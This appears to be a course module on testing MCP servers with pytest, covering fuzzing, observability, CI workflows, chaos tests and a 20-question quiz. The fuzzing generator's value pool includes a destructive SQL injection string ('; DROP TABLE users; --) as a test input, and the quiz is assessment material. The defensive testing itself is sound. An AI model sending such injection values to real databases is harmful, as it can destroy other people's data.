async def test_large_payload(mcp_client):
    """Test server handles large payloads safely"""
    large_value = "X" * 1_000_000
    with pytest.raises(Exception):  # Should reject or time out
        await mcp_client.call_tool("calculate_discount", {
            "original_price": large_value,
            "discount_percent": 20
        })
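Beyond fixed injection strings, fuzzing feeds the tool a stream of hostile and malformed values. A small stdlib-only generator sketch follows; the payload categories are illustrative, not exhaustive, and the seeding keeps failures reproducible:

```python
import random
import string

def fuzz_values(seed: int, count: int) -> list:
    """Generate a mix of hostile / malformed values for tool parameters."""
    rng = random.Random(seed)  # seeded for reproducible test runs
    pool = [
        None,                        # missing-value analogue
        "",                          # empty string
        "X" * 10_000,                # oversized string
        -1e308, 1e308,               # float extremes
        "'; DROP TABLE users; --",   # classic SQL injection
        {"nested": {"deep": True}},  # unexpected structure
    ]
    generated = [
        "".join(rng.choices(string.printable, k=rng.randint(1, 64)))
        for _ in range(count)
    ]
    return pool + generated

cases = fuzz_values(seed=42, count=10)
```

Each value in `cases` would then be passed as `original_price` (or any other parameter), asserting the server either rejects it cleanly or returns a sane result.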

Running the Tests

# Run all tests
$ pytest

# Run a specific test file
$ pytest tests/test_discount.py

# Run tests by marker
$ pytest -m unit
$ pytest -m security

# Run with verbose output
$ pytest -v

# Run with coverage
$ pytest --cov=src --cov-report=html

πŸ§ͺ Your Turn: Write Tests

Task: Write test cases for the currency_converter tool covering:

  1. Valid conversion (USD to EUR)
  2. Same currency conversion (USD to USD)
  3. Invalid currency code
  4. Negative amount
  5. Zero amount
  6. Missing required field

Use the discount tests as a template!

Module 4

Advanced SDET Architecture

Observability Design

Production MCP servers need comprehensive observability: logs, metrics, and traces.

Logging Strategy

import logging
import json
from datetime import datetime

# Structured logging for MCP server
logger = logging.getLogger("mcp_server")

def log_tool_call(tool_name: str, params: dict, duration_ms: float, success: bool):
    """Log structured tool call data"""
    log_entry = {
        "timestamp": datetime.utcnow().isoformat(),
        "event": "tool_call",
        "tool": tool_name,
        "params": params,
        "duration_ms": duration_ms,
        "success": success
    }
    logger.info(json.dumps(log_entry))
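Structured logs are only useful if they stay machine-parseable, which is itself worth a test. A self-contained sketch that captures a log line in memory and round-trips it through `json.loads` (the StringIO handler wiring is test scaffolding, not production config):

```python
import io
import json
import logging

# Route a dedicated logger into an in-memory buffer for inspection
buffer = io.StringIO()
logger = logging.getLogger("mcp_server_test")
logger.setLevel(logging.INFO)
logger.addHandler(logging.StreamHandler(buffer))

def log_tool_call(tool_name: str, params: dict, duration_ms: float, success: bool):
    logger.info(json.dumps({
        "event": "tool_call",
        "tool": tool_name,
        "params": params,
        "duration_ms": duration_ms,
        "success": success,
    }))

log_tool_call("calculate_discount", {"original_price": 100}, 12.5, True)

# The captured line must parse back into the same structure
entry = json.loads(buffer.getvalue())
```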

Metrics Collection

from prometheus_client import Counter, Histogram

# Define metrics
tool_calls_total = Counter(
    'mcp_tool_calls_total',
    'Total tool calls',
    ['tool_name', 'status']
)
tool_duration_seconds = Histogram(
    'mcp_tool_duration_seconds',
    'Tool execution duration',
    ['tool_name']
)

# Use in code
tool_calls_total.labels(tool_name="calculate_discount", status="success").inc()
tool_duration_seconds.labels(tool_name="calculate_discount").observe(0.05)
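In unit tests you often don't want a real Prometheus registry behind your metrics calls. A minimal stand-in counter, sketched with stdlib only; the class and method names mirror the `labels().inc()` usage above but are otherwise invented here:

```python
from collections import defaultdict

class CounterStub:
    """Test double mimicking prometheus_client Counter's labels().inc() API."""
    def __init__(self):
        self.values = defaultdict(float)

    def labels(self, **label_kwargs):
        key = tuple(sorted(label_kwargs.items()))
        stub = self

        class _Child:
            def inc(self, amount: float = 1.0):
                stub.values[key] += amount

        return _Child()

tool_calls_total = CounterStub()
tool_calls_total.labels(tool_name="calculate_discount", status="success").inc()
tool_calls_total.labels(tool_name="calculate_discount", status="success").inc()

key = (("status", "success"), ("tool_name", "calculate_discount"))
```

Tests can then assert that the code under test incremented the expected label combination, without any metrics backend running.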

CI/CD Integration

GitHub Actions Workflow

# .github/workflows/test.yml
name: MCP Server Tests

on: [push, pull_request]

jobs:
  test:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v2
      - name: Set up Python
        uses: actions/setup-python@v2
        with:
          python-version: '3.11'
      - name: Install dependencies
        run: |
          pip install -r requirements.txt
          pip install pytest pytest-cov
      - name: Run unit tests
        run: pytest -m unit --cov=src
      - name: Run integration tests
        run: pytest -m integration
      - name: Run security tests
        run: pytest -m security
      - name: Check coverage
        run: pytest --cov=src --cov-fail-under=80
      - name: Contract tests (breaking change detection)
        run: pytest tests/test_contract.py --strict

Test Automation Architecture

Test Automation Architecture
════════════════════════════

┌───────────────────────────────────────────────┐
│               CI/CD Pipeline                  │
│                                               │
│  ┌────────┐     ┌───────────┐    ┌────────┐   │
│  │ Commit │  →  │ Run Tests │ →  │ Deploy │   │
│  └────────┘     └─────┬─────┘    └────────┘   │
└───────────────────────┼───────────────────────┘
                        │
         ┌──────────────┴──────────────┐
         │                             │
   ┌─────▼─────┐                 ┌─────▼─────┐
   │ Contract  │                 │   Unit    │
   │  Tests    │                 │  Tests    │
   └─────┬─────┘                 └─────┬─────┘
         │                             │
   ┌─────▼─────┐                 ┌─────▼─────┐
   │Integration│                 │Performance│
   │  Tests    │                 │  Tests    │
   └─────┬─────┘                 └─────┬─────┘
         │                             │
         └──────────────┬──────────────┘
                        │
          ┌─────────────▼─────────────┐
          │       Test Reports        │
          │  • Coverage   • Results   │
          │  • Metrics                │
          └───────────────────────────┘

Chaos Testing Strategies

Test server resilience under failure conditions:

import pytest
import asyncio

@pytest.mark.chaos
async def test_server_restart_resilience(mcp_client, server):
    """Test client handles server restart"""
    # Make initial call
    result1 = await mcp_client.call_tool("calculate_discount", {...})
    assert "result" in result1

    # Simulate server restart
    await server.restart()
    await asyncio.sleep(1)

    # Reconnect and retry
    await mcp_client.reconnect()
    result2 = await mcp_client.call_tool("calculate_discount", {...})
    assert "result" in result2

@pytest.mark.chaos
async def test_network_partition(mcp_client):
    """Test behavior during network issues"""
    # Inject network delay (network_delay is a fault-injection helper
    # provided by your test harness)
    with network_delay(500):  # 500ms delay
        result = await mcp_client.call_tool("calculate_discount", {...})
    # Should still succeed, but be slower

@pytest.mark.chaos
async def test_resource_exhaustion(mcp_client):
    """Test server under resource pressure"""
    # Fill server memory (high_memory_pressure is a harness helper)
    with high_memory_pressure():
        # Server should still respond
        result = await mcp_client.call_tool("calculate_discount", {...})
    assert "result" in result or "error" in result
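Restart and partition scenarios usually pair with a retry policy on the client side. A self-contained sketch of exponential backoff around a flaky call; the `flaky_call` stub (invented here) simulates two failures before success:

```python
import asyncio

async def with_retries(coro_factory, attempts: int = 4, base_delay: float = 0.01):
    """Retry an async call with exponential backoff between attempts."""
    for attempt in range(attempts):
        try:
            return await coro_factory()
        except ConnectionError:
            if attempt == attempts - 1:
                raise  # out of retries, surface the failure
            await asyncio.sleep(base_delay * (2 ** attempt))

# Stub that fails twice, then succeeds - simulates a restarting server
calls = {"n": 0}
async def flaky_call():
    calls["n"] += 1
    if calls["n"] < 3:
        raise ConnectionError("server restarting")
    return {"result": "ok"}

result = asyncio.run(with_retries(flaky_call))
```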

Version Compatibility Testing

def test_backward_compatibility():
    """Test new server version with old client"""
    # V1 client
    v1_client = MCPClient(protocol_version="1.0")
    # V2 server (with new optional fields)
    v2_server = MCPServer(protocol_version="2.0")

    # V1 client should still work with V2 server
    result = v1_client.call_tool("calculate_discount", {
        "original_price": 100,
        "discount_percent": 20
    })  # Not using new V2 fields
    assert "result" in result
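One mechanical way to catch the classic breaking change (a newly required parameter) is to diff tool schemas between versions. A stdlib-only sketch; the two sample schemas below are invented for illustration:

```python
def find_breaking_changes(old_tool: dict, new_tool: dict) -> list[str]:
    """Compare two versions of a tool's inputSchema for breaking changes."""
    issues = []
    old_req = set(old_tool["inputSchema"].get("required", []))
    new_req = set(new_tool["inputSchema"].get("required", []))
    old_props = set(old_tool["inputSchema"].get("properties", {}))
    new_props = set(new_tool["inputSchema"].get("properties", {}))

    for param in sorted(new_req - old_req):
        issues.append(f"new required parameter: {param}")  # breaking
    for param in sorted(old_props - new_props):
        issues.append(f"removed parameter: {param}")       # breaking
    return issues

v1 = {"inputSchema": {"properties": {"original_price": {}, "discount_percent": {}},
                      "required": ["original_price", "discount_percent"]}}
v2 = {"inputSchema": {"properties": {"original_price": {}, "discount_percent": {},
                                     "currency": {}},
                      "required": ["original_price", "discount_percent", "currency"]}}
```

Run in CI against the previous release's schemas, this turns "did we break old clients?" into a deterministic check.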
🎯 Key Takeaway

Advanced testing goes beyond functional validation. Focus on observability, automation, resilience, and maintaining compatibility as your system evolves.

Final Assessment

Knowledge Check Quiz

Test your understanding of MCP server testing. Select the best answer for each question.

Question 1 of 20
What is the primary difference between MCP and REST APIs?
A) MCP uses JSON while REST uses XML
B) MCP is stateful with bidirectional sessions, REST is typically stateless
C) MCP is faster than REST
D) MCP doesn't support error handling
Question 2 of 20
Which JSON-RPC error code indicates "Invalid params"?
A) -32700
B) -32600
C) -32602
D) -32603
Question 3 of 20
What are the three primary MCP primitives?
A) GET, POST, DELETE
B) Tools, Resources, Prompts
C) Client, Server, Transport
D) Request, Response, Error
Question 4 of 20
In contract testing, which change is considered breaking?
A) Adding a new optional parameter
B) Adding a new tool
C) Adding a required parameter to an existing tool
D) Improving error messages
Question 5 of 20
What is the recommended p95 latency target for MCP tool calls?
A) < 10ms
B) < 100ms
C) < 1000ms
D) < 5000ms
Question 6 of 20
Which transport mechanism does MCP NOT support?
A) stdio
B) HTTP+SSE
C) WebSocket
D) gRPC
Question 7 of 20
In JSON Schema validation for MCP tools, which field is optional in the tool definition?
A) name
B) inputSchema
C) description
D) All fields are required
Question 8 of 20
What is prompt injection in the context of MCP security testing?
A) Injecting SQL commands into database queries
B) Manipulating tool parameters to execute unintended commands
C) Adding extra prompts to the MCP server
D) Overloading the server with too many prompts
Question 9 of 20
During capability negotiation, what should a client do if the server doesn't support a required capability?
A) Proceed anyway and hope for the best
B) Fail gracefully and inform the user
C) Try to force the server to support it
D) Automatically downgrade to HTTP
Question 10 of 20
What test type should you use to verify that removing a tool doesn't break existing clients?
A) Unit tests
B) Performance tests
C) Contract tests
D) Security tests
Question 11 of 20
In the MCP protocol, what does "listChanged: true" in capabilities mean?
A) The server can change its list of items
B) The server will notify clients when the list changes
C) The list has already changed
D) Clients must poll for list changes
Question 12 of 20
What is the primary purpose of fuzzing in MCP security testing?
A) To test server performance under load
B) To find unexpected crashes or vulnerabilities with random inputs
C) To test network latency
D) To validate JSON schema compliance
Question 13 of 20
Which pytest marker would you use for tests that validate the server can handle 100+ concurrent requests?
A) @pytest.mark.unit
B) @pytest.mark.integration
C) @pytest.mark.performance
D) @pytest.mark.security
Question 14 of 20
What is the N × M problem that MCP solves?
A) N AI applications × M tools = N×M custom integrations
B) N servers × M clients = N×M connections
C) N requests × M responses = N×M data transfer
D) N databases × M queries = N×M performance issues
Question 15 of 20
When testing tool schema validation, what should happen if a required field is missing?
A) Server should use a default value
B) Server should return error code -32602 (Invalid params)
C) Server should proceed with null value
D) Server should ask the client for the missing field
Question 16 of 20
What is the purpose of chaos testing in MCP server validation?
A) To create random test data
B) To test server resilience under failure conditions
C) To disorder test execution order
D) To test without any test plan
Question 17 of 20
In observability design, what are the three pillars you should implement?
A) Frontend, Backend, Database
B) Logs, Metrics, Traces
C) Unit, Integration, E2E tests
D) Client, Server, Transport
Question 18 of 20
Which test scenario best validates concurrent tool invocation handling?
A) Calling one tool 100 times sequentially
B) Calling the same tool 20 times simultaneously
C) Calling different tools one at a time
D) Testing with a single client connection
Question 19 of 20
What should you verify in a backward compatibility test?
A) Old server works with new client
B) New server works with old client
C) Both servers and clients are the same version
D) The database schema hasn't changed
Question 20 of 20
When should you use snapshot testing for MCP servers?
A) To capture performance metrics over time
B) To detect unintended changes in API response structure
C) To take screenshots of the UI
D) To backup the server state